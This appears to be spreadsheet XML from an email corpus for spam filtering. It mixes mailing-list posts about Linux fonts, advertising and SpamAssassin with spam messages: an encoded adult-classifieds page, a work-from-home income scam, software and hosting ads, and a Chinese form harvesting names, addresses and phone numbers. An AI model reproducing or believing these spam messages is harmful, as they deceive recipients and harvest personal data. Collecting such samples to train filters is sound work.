 &gt; So if your fonts look ugly, lack of bytecode hinting is *not* the cause.
 Well you are right, sorry, I didn't have any better idea yesterday late in
 the evening.
 The fonts are ugly only inside of gnome2 and clean for gnome1 apps, if
 antialiasing is disabled. 
 This is difficult to understand for me.
 --
 regards from Germany
                    Matthias
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: John Robb has an interesting perspective on trust-based,
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.joelonsoftware.com/news/20020913.html
 Date: Not supplied
 John Robb has an interesting perspective on trust-based, targetted advertising
 [1] based on his experiences at Gomez during the heady days of the Internet 
 gold rush. 
 Nobody believes advertisements[2] any more. There's a lot of evidence that 
 advertising just doesn't work, no matter how targetted, so if you have a 
 product to sell you have no choice but to get into the editorial side, where 
 consumers' defenses are lowered. Product placements are one example of this. 
 There is an unfortunate tragedy of the commons, here. When advertising first 
 rose to prominence, advertisements _did_ work. We hadn't built up our 
 immunities yet. As more and more advertisers used the opportunity of the medium 
 to lie, we learned not to trust advertisements. But we still trust editorial. 
 And once editorial gets polluted by desperate marketers using PR instead 
 of advertising to promote their message, nobody will believe it either.
 [1] http://jrobb.userland.com/stories/2002/09/11/trustbasedAdvertising.html
 [2] http://www.amazon.com/exec/obidos/ASIN/0060081988/ref=nosim/joelonsoftware
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] custom score for a given domain?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; the number 1 ISP in France and the third ISP in
 &gt; Europe Wanadoo.fr is using non RFC2822 compliant
 &gt; mail servers:
 Wanadoo.fr is notorious for being unresponsive to spam abuse 
 complaints.  Some of the more militant admins have blocked them 
 completely.
 Rossz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</si>
  <si>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Re: Adult Classifieds
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C2_37C70C2D.A8844B81
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDQuMDEg
 VHJhbnNpdGlvbmFsLy9FTiI+DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPkFk
 dWx0IENsYXNzaWZpZWQgMmsyPC90aXRsZT4NCjxtZXRhIGh0dHAtZXF1aXY9
 IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlz
 by04ODU5LTEiPg0KPC9oZWFkPg0KDQo8Ym9keSBiZ2NvbG9yPSIjRkZGRkZG
 IiBsaW5rPSIjQ0M5OTk5IiBsZWZ0bWFyZ2luPSIwIiB0b3BtYXJnaW49IjAi
 IG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPg0KDQo8Y2VudGVy
 Pg0KICA8YnI+DQogIDx0YWJsZSB3aWR0aD0iNjAwIiBib3JkZXI9IjAiIGNl
 bGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMSI+DQogICAgPHRyPg0KICAg
 ICAgPHRkIGJnY29sb3I9IiM5OTAwMDAiPjx0YWJsZSB3aWR0aD0iNjAwIiBi
 b3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+DQog
 ICAgICAgICAgPHRyPg0KICAgICAgICAgICAgPHRkIGJnY29sb3I9IiNGRkZG
 RkYiPg0KICAgICAgICAgIA0KICAgICAgICAgIDxkaXYgYWxpZ249InJpZ2h0
 Ij48aW1nIHNyYz0iaHR0cDovL3d3dy54eHhtYXRjaC5uZXQvbG9nby5qcGci
 IHdpZHRoPSI2MDAiIGhlaWdodD0iNjUiPjxicj4NCiAgICAgICAgICA8Yj48
 Zm9udCBjb2xvcj0iI0NDMDAzMyIgc2l6ZT0iMiIgZmFjZT0iR2VuZXZhLCBB
 cmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIj4tLS0gVGhlIG1vc3QgY29t
 cHJlaGVuc2l2ZSBhZHVsdCBtYXRjaCBtYWtpbmcgc2VydmljZTxicj4NCiAg
 ICAgICAgICA8YnI+DQogICAgICAgICAgICAgICAgICAgIDwvZm9udD48L2I+
 DQo8L2Rpdj48L3RkPg0KICAgICAgICAgIDwvdHI+DQogICAgICAgICAgPHRy
 Pg0KICAgICAgICAgICAgPHRkIGJnY29sb3I9IiNGRkZGRkYiPjxjZW50ZXI+
 DQogICAgICAgICAgICAgICAgPHRhYmxlIHdpZHRoPSI0MDAiIGJvcmRlcj0i
 MCIgY2VsbHNwYWNpbmc9IjMiIGNlbGxwYWRkaW5nPSIxIj4NCiAgICAgICAg
 ICAgICAgICAgIDx0ciBiZ2NvbG9yPSIjOTkwMDAwIj4NCiAgICAgICAgICAg
 ICAgICAgICAgPHRkIHdpZHRoPSIxMDAiPjxpbWcgc3JjPSJodHRwOi8vd3d3
 Lnh4eG1hdGNoLm5ldC9mcm9udHBpYy00LmdpZiIgd2lkdGg9IjEwMCIgaGVp
 Z2h0PSIxNTAiPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0
 aD0iMTAwIj48aW1nIHNyYz0iaHR0cDovL3d3dy54eHhtYXRjaC5uZXQvZnJv
 bnRwaWNtLTIuZ2lmIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjE1MCI+PC90ZD4N
 CiAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIxMDAiPjxpbWcgc3Jj
 PSJodHRwOi8vd3d3Lnh4eG1hdGNoLm5ldC9mcm9udHBpYy0yLmdpZiIgd2lk
 dGg9IjEwMCIgaGVpZ2h0PSIxNTAiPjwvdGQ+DQogICAgICAgICAgICAgICAg
 ICAgIDx0ZCB3aWR0aD0iMTAwIj48aW1nIHNyYz0iaHR0cDovL3d3dy54eHht
 YXRjaC5uZXQvZnJvbnRwaWNtLTEuZ2lmIiB3aWR0aD0iMTAwIiBoZWlnaHQ9
 IjE1MCI+PC90ZD4NCiAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAg
 ICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICA8Zm9udCBjb2xv
 cj0iIzk5MDAwMCIgc2l6ZT0iMSIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhl
 bHZldGljYSwgc2Fucy1zZXJpZiI+Q2hlY2sgc29tZSBvZiBvdXIgIGFjdHVh
 bCBwaWN0dXJlcyBmcm9tIDxiPnJlYWw8L2I+IG1lbWJlcnMhPC9mb250Pjxi
 cj4NCiAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQyMCIgYm9yZGVy
 PSIwIiBjZWxsc3BhY2luZz0iMyIgY2VsbHBhZGRpbmc9IjEiPg0KICAgICAg
 ICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgICA8dGQ+PGNl
 bnRlcj4NCiAgICAgICAgICAgICAgICAgIDxmb250IGNvbG9yPSIjOTkwMDAw
 IiBzaXplPSIyIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBz
 YW5zLXNlcmlmIj48YnI+DQogICAgICAgICAgICAgICAgICA8YnI+DQogICAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQg
 c2l6ZT0iMiIgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fu
 cy1zZXJpZiI+PC9mb250Pjxmb250IGNvbG9yPSIjOTkwMDAwIiBzaXplPSIy
 IiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
 Ij48Yj5XZWxjb21lPC9iPiB0byBvbmUgb2YgdGhlIEludGVybmV0J3MgcHJl
 bWllciBhZHVsdCBtYXRjaCBtYWtpbmcgc2VydmljZXMgd2hlcmUgcGVvcGxl
 IGp1c3QgbGlrZSB5b3Vyc2VsZiBjYW4gdmlldyBhbmQgcGxhY2UgcGVyc29u
 YWwgYWR2ZXJ0aXNlbWVudHMgd2hpY2ggYXJlIHZpZXdlZCBieSB0aG91c2Fu
 ZHMgZGFpbHkhDQo8YnI+DQogICAgICAgICAgICAgICAgICA8YnI+DQogICAg
 ICAgICAgICAgICAgICA8L2ZvbnQ+DQogICAgICAgICAgICAgICAgICAgICAg
 PC9jZW50ZXI+DQogICAgICAgICAgICAgICAgICAgICAgPGNlbnRlcj4NCiAg
 ICAgICAgICAgICAgICAgIDxmb250IGNvbG9yPSIjOTkwMDAwIiBzaXplPSIy
 IiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlm
 Ij4NCiAgICAgICAgICAgICAgICBXZWIgQWR1bHQgQ2xhc3NpZmllZHMgaGFz
 IHRob3VzYW5kcyBvZiBhZHMgLSBzb21ldGhpbmcgZm9yIGV2ZXJ5b25lLCBt
 YWxlIG9yIGZlbG1hbGUhIA0KICAgICAgICAgICAgICAgIDwvZm9udD4NCiAg
 ICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgIDxmb250IGNvbG9y
 PSIjOTkwMDAwIiBzaXplPSIyIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVs
 dmV0aWNhLCBzYW5zLXNlcmlmIj48YnI+DQogICAgICAgICAgICAgICAgICA8
 YnI+DQogICAgICAgICAgICAgICAgICA8L2ZvbnQ+PGZvbnQgc2l6ZT0iMiIg
 ZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiI+
 DQogICAgICAgICAgICAgICAgICA8YnI+DQogICAgICAgICAgICAgICAgICA8
 aW1nIHNyYz0iaHR0cDovL3d3dy54eHhtYXRjaC5uZXQvaGVhcnQuZ2lmIiB3
 aWR0aD0iMTUiIGhlaWdodD0iMTMiPiZuYnNwOyAgICAgICAgICAgICAgICAg
 IA0KICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iaHR0cDovL3d3dy54eHht
 YXRjaC5uZXQvdmVyaWZ5Lmh0bSI+PGI+Q2xpY2sgaGVyZSB0byBiZSBjb252
 aW5jZWQ8L2I+PC9hPiZuYnNwOyZuYnNwOzxpbWcgc3JjPSJodHRwOi8vd3d3
 Lnh4eG1hdGNoLm5ldC9oZWFydC5naWYiIHdpZHRoPSIxNSIgaGVpZ2h0PSIx
 MyI+PGJyPg0KICAgICAgICAgICAgICAgICAgPGZvbnQgY29sb3I9IiM5OTAw
 MDAiIHNpemU9IjEiPjxiPih3aWxsIG9wZW4gaW4gYSBuZXcgd2luZG93IGZv
 ciB5b3VyIGNvbnZlbmllbmNlKTwvYj48L2ZvbnQ+PC9mb250Pjxicj4NCiAg
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2NlbnRlcj48L3Rk
 Pg0KICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICA8
 L3RhYmxlPg0KICAgICAgICAgICAgICAgIDxicj4NCiAgICAgICAgPC9jZW50
 ZXI+PC90ZD4NCiAgICAgICAgICA8L3RyPg0KICA8L3RhYmxlPjwvdGQ+DQog
 ICAgPC90cj4NCiAgPC90YWJsZT4NCiAgDQogIDx0YWJsZSB3aWR0aD0iNjAw
 IiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+
 DQogICAgPHRyPg0KICAgICAgPHRkPjxkaXYgYWxpZ249InJpZ2h0Ij48Zm9u
 dCBzaXplPSIxIiBmYWNlPSJWZXJkYW5hLCBBcmlhbCwgSGVsdmV0aWNhLCBz
 YW5zLXNlcmlmIj48Yj4mY29weTtYeHhNYXRjaC5uZXQgMjAwMjwvYj48L2Zv
 bnQ+DQo8L2Rpdj48L3RkPg0KICAgIDwvdHI+DQogIDwvdGFibGU+DQogIDxi
 cj4NCjwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg0KDQo0MTk5bHJqbDc=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hi
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you dream of working for yourself? From the
 luxury of your own home?
 THEN STOP DAYDREAMING AND DO SOMETHING ABOUT IT!
 IT WONT HAPPEN JUST SITTING THERE!
 FREE INFO! FREE INFO! FREE INFO!
 No obligation whatsoever.
 http://www.lotsonet.com/opportunity
 We are a fortune 500 company and we want motivated
 individuals who are willing to work from home.  This
 is not a get rich quick scheme, you will have to work,
 but you can do it from the comfort of your own home,
 and make much more than you can working for someone
 else.
 FREE INFO! FREE INFO! FREE INFO!
 No obligation whatsoever.
 http://www.lotsonet.com/opportunity
 To be removed from this list go to:
 http://www.lotsonet.com/opportunity/remove.html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</si>
  <si>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FREE WebBook Publishing Software - Download NOW!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Publishing Tools - Free Software Alert!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;center&gt;
 &lt;table width="582" border="2" cellspacing="0" cellpadding="5" bordercolor="#0077CC"&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt;&lt;!7193hwTc1-999eObm7066Xnpw8-036oCJf1414bpkE6-474fHBB5776EFzK8-365hrba2931Zqgw4-l73&gt;
 &lt;a href="http://www.3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt;Publish Like a Professional with Digital Publishing Tools&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="1" width="204" valign="top"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Easily Create Professional:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;eBooks&lt;/li&gt;
 &lt;li&gt;eBrochures&lt;/li&gt;
 &lt;li&gt;eCatalogs&lt;/li&gt;
 &lt;li&gt;Resumes&lt;/li&gt;
 &lt;li&gt;Newsletters&lt;/li&gt;
 &lt;li&gt;Presentations&lt;/li&gt;
 &lt;li&gt;Magazines&lt;/li&gt;
 &lt;li&gt;Photo Albums&lt;/li&gt;
 &lt;li&gt;Invitations&lt;/li&gt;
 &lt;li&gt;Much, much more&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="264" valign="top" align="center"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Save MONEY! - Save Trees&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;
 Save on Printing, Postage and Advertising Costs&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000099" size="5"&gt;DIGITAL PUBLISHING TOOLS&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="3"&gt;DOWNLOAD NEW FREE Version NOW!&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;*Limited Time Offer&lt;/font&gt;
 &lt;/td&gt;
 &lt;td width="204" valign="top"&gt;&lt;b&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" size="2" color="#000066"&gt;Choose from these&lt;br&gt;
 Display Styles:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;3D Page Turn&lt;/li&gt;
 &lt;li&gt;Slide Show&lt;/li&gt;
 &lt;li&gt;Sweep/Wipe&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;Embed hyperlinks and Link to anywhere Online, 
 such as your Website, Order Page or Contact Form.
 &lt;br&gt;
 &lt;br&gt;
 Distribute via Floppy, CD-ROM, E-Mail or Online.
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt; 
 &lt;font color="#FFFFFF" face="Verdana, Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;
 Take your Marketing to the Next Level!&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2" width="384"&gt; 
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 For &lt;b&gt;More Info&lt;/b&gt;, &lt;b&gt;Samples&lt;/b&gt; or a &lt;b&gt;FREE Download&lt;/b&gt;, click the appropriate link to the right! &amp;nbsp;
 Server demand is extremely high for this limited time &lt;b&gt;Free Software&lt;/b&gt; offer. &amp;nbsp;
 &lt;b&gt;Please try these links periodically if a site seems slow or unreachable.&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="204" align="center"&gt; 
 &lt;b&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif"&gt;
 &lt;a href="http://www.3dpageturningebook.com"&gt;WEBSITE 1&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://TheyGo.com/FreeSoftware"&gt;WEBSITE 2&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://www.digitalpublishingtools.com"&gt;WEBSITE 3&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center"&gt;
 &lt;form action="http://www.3dpageturningebook.com/unsubscribe.asp" method="post"&gt;
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 If you wish to be removed from our mailing list, please cick the Unsubscribe button
 &lt;/font&gt;
 &lt;br&gt;
 &lt;input size="25" name="e" value="webmaster@efi.ie
 "&gt; &amp;nbsp;&lt;input type="submit" value="Unsubscribe"&gt;
 &lt;input type="hidden" name="c" value="unsub"&gt;
 &lt;/form&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" color=#000066 size=1&gt;Copyright  2002 - Affiliate ID #1269&lt;br&gt;
 *FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 page spread) limit.&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?Big5?B?ur+36qfZq/wtMi0xNDgt?=
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html;charset=3Dbig5"&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dbig5"&gt;
 &lt;META content=3D"MSHTML 6.00.2713.1100" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;
 &lt;P align=3Dcenter&gt;&lt;IMG height=3D330 src=3D"http://vip.6to23.com/bensu168/=
 love.gif"=20
 width=3D416 border=3D0&gt;&lt;/P&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;CENTER&gt;
 &lt;TABLE height=3D219 cellSpacing=3D0 cellPadding=3D0 width=3D452 bgColor=3D=
 #ff99ff=20
 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D452 height=3D219&gt;
       &lt;CENTER&gt;&lt;/CENTER&gt;=A1@=20
       &lt;FORM action=3Dhttp://www.xline.com.tw/f2m/f2m.php?F=3D1011690559 m=
 ethod=3Dpost&gt;
       &lt;P style=3D"MARGIN-TOP: -10px" align=3Dleft&gt;&lt;FONT=20
       size=3D2&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: -10px" align=3Dleft&gt;&lt;B&gt;&lt;FONT color=3D#00000=
 0=20
       size=3D2&gt;&amp;nbsp; &lt;/FONT&gt;&lt;/B&gt;&lt;FONT size=3D2&gt;=B2=A3=AB~=A6W=BA=D9=A1G&lt;=
 /FONT&gt;&lt;B&gt;&lt;FONT=20
       color=3D#ffffff&gt;&lt;SELECT size=3D1 name=3DD1&gt; &lt;OPTION=20
       selected&gt;=BA=BF=B7=EA=A7=D9=AB=FC&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: -17px" align=3Dleft&gt;&lt;FONT size=3D2&gt;&amp;nbsp;&amp;n=
 bsp;=20
       =A9m=A1@&amp;nbsp;&amp;nbsp;&amp;nbsp; =A6W=A1G&lt;INPUT size=3D16=20
       name=3DNAME&gt;=B6=B7=B6=F1=BCg=A4=A4=A4=E5=A5=FE=A6W=A1A=A4=C5=B6=F1=BC=
 g=BC=CA=BA=D9&lt;BR&gt;&amp;nbsp;&amp;nbsp; =A6=ED&amp;nbsp;&amp;nbsp;&amp;nbsp; =A1@=A7}=A1G&lt;INPUT=
 =20
       size=3D47 name=3DADD&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: -18px" align=3Dleft&gt;&lt;FONT size=3D2&gt;&amp;nbsp;&amp;n=
 bsp;=20
       =A6=ED=A6v=B9q=B8=DC=A1G&lt;INPUT size=3D26 name=3DHOME_TEL&gt;&lt;/FONT&gt;&lt;/P=
 &gt;
       &lt;P style=3D"MARGIN-TOP: -18px" align=3Dleft&gt;&lt;FONT=20
       size=3D2&gt;&amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;FONT size=3D2&gt; =A4=BD=A5q=B9q=B8=DC=A1=
 G&lt;INPUT size=3D26=20
       name=3DOFFICE_TEL&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: -18px" align=3Dleft&gt;&lt;FONT=20
       size=3D2&gt;&amp;nbsp;&amp;nbsp;&lt;/FONT&gt;&lt;FONT size=3D2&gt; =A6=E6=B0=CA=B9q=B8=DC=A1=
 G&lt;INPUT size=3D26=20
       name=3DMOBIL_TEL&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: -18px" align=3Dleft&gt;&lt;FONT size=3D2&gt;&amp;nbsp;&amp;n=
 bsp;=20
       =B9q=A4l=B6l=A5=F3=A1G&lt;/FONT&gt;&lt;INPUT size=3D26 name=3DE_MAIL&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: -18px" align=3Dleft&gt;&lt;FONT size=3D2&gt;&amp;nbsp;&amp;n=
 bsp;=20
       =B2=CE=A4@=BDs=B8=B9=A1G&lt;/FONT&gt;&lt;INPUT size=3D26 name=3DE_MAIL1&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: -18px; LINE-HEIGHT: 150%" align=3Dcenter&gt;&amp;n=
 bsp;&amp;nbsp;=20
       &lt;INPUT type=3Dradio value=3DDATA name=3DCHOICE&gt;&lt;FONT color=3D#00008=
 0=20
       size=3D2&gt;=A7=DA=A7=C6=B1=E6=A6=AC=A8=EC=A7=F3=A6h=AA=BA=A7K=B6O=B0=D3=
 =AB~=B8=EA=B0T=B9q=A4l=B3=F8&lt;/FONT&gt;&lt;BR&gt;&amp;nbsp; &lt;FONT color=3D#000000=20
       size=3D2&gt;=B3=C6=A1@=A1@=B5=F9=A1G=A5=D3=BD=D0=A4H=A5u=B6=B7=ADt=BE=E1=
 =AC=A1=B0=CA=C3=D8=AB~=B9B=B6O150=A4=B8=A1A=BD=D0=BDT=B9=EA&lt;/FONT&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: -18px; LINE-HEIGHT: 150%" align=3Dcenter&gt;&lt;F=
 ONT=20
       color=3D#000000 size=3D2&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;=20
       =B6=F1=BD=D0=A5=D3=BD=D0=AA=ED=A1A=A6p=B8=EA=AE=C6=A6=B3=BB~=B1N=A4=
 =A3=B3B=B2z=A1C&lt;/FONT&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: -10px; LINE-HEIGHT: 150%" align=3Dcenter&gt;
       &lt;CENTER&gt;&amp;nbsp;&amp;nbsp; &lt;INPUT type=3Dsubmit value=3D=BDT=A9w name=3DO=
 K&gt;&amp;nbsp; &lt;INPUT type=3Dreset value=3D=AD=AB=B7s=B3]=A9w name=3DRESET&gt;&lt;/CE=
 NTER&gt;
       &lt;CENTER&gt;
       &lt;P&gt;&lt;/P&gt;&lt;/FORM&gt;&lt;/CENTER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;SCRIPT language=3DJavaScript&gt;&lt;/SCRIPT&gt;
 &lt;SCRIPT language=3DJavaScript&gt;&lt;/SCRIPT&gt;
 &lt;SCRIPT language=3DVBScript&gt;       =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
        =20
            =20
            =20
            =20
            =20
            =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
              =20
            =20
        =20
        =20
        =20
 &lt;/SCRIPT&gt;
 &lt;/CENTER&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;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</si>
  <si>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Top Quality Web Hosting - CHEAP!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;title&gt;$7.95 Power Hosting&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;meta http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;meta content="MSHTML 6.00.2479.6" name=GENERATOR&gt;&lt;body bgcolor="#FFFFFF"&gt;&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt; 
 &lt;table cellspacing=0 cellpadding=0 width=530 align=center border=0&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td noWrap&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;b&gt;&lt;i&gt;&lt;font face="Arial, Helvetica, sans-serif" color=#993300 size=3&gt;Limited Time Offer: &lt;font color=black&gt; Sign up and get&lt;/font&gt;&lt;a HREF="http://www.qksrv.net/click-1105018-8003934?URL=https%3A%2F%2Fipowerwe.securesites.com%2Ftracker.cgi%3Frid%3D20"&gt;FREE DOMAIN&lt;/a&gt;&lt;font color=black&gt;and&lt;/font&gt; Free setup&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=530&gt;&lt;table bordercolor=#b7b8b9 cellspacing=0 cellpadding=0 width="100%" align=center border=1&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td width="100%"&gt;
             &lt;div align=center&gt;
 &lt;table cellspacing=0 cellpadding=0 width="100%" border=0&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;a HREF="http://www.qksrv.net/click-1105018-8003934?URL=https%3A%2F%2Fipowerwe.securesites.com%2Ftracker.cgi%3Frid%3D20"&gt;&lt;img border=0 height=57 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/logo.gif" width=238&gt;&lt;/a&gt;&lt;/td&gt;&lt;td width="99%" background=http://ads.ipowerweb.com/ipowerweb_virtu/images/bg_top.gif&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;img height=57 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/intro.gif" width=238&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br&gt;&lt;table cellspacing=0 cellpadding=0 width="100%" border=0&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td valign=top width="99%"&gt;&lt;table cellspacing=0 cellpadding=0 width=150 align=center border=0&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td width=16&gt;&lt;img height=5 src="http://ads.ipowerweb.com/ipowerweb_virtu/images/bullets.gif" width=10&gt;&lt;/td&gt;&lt;td 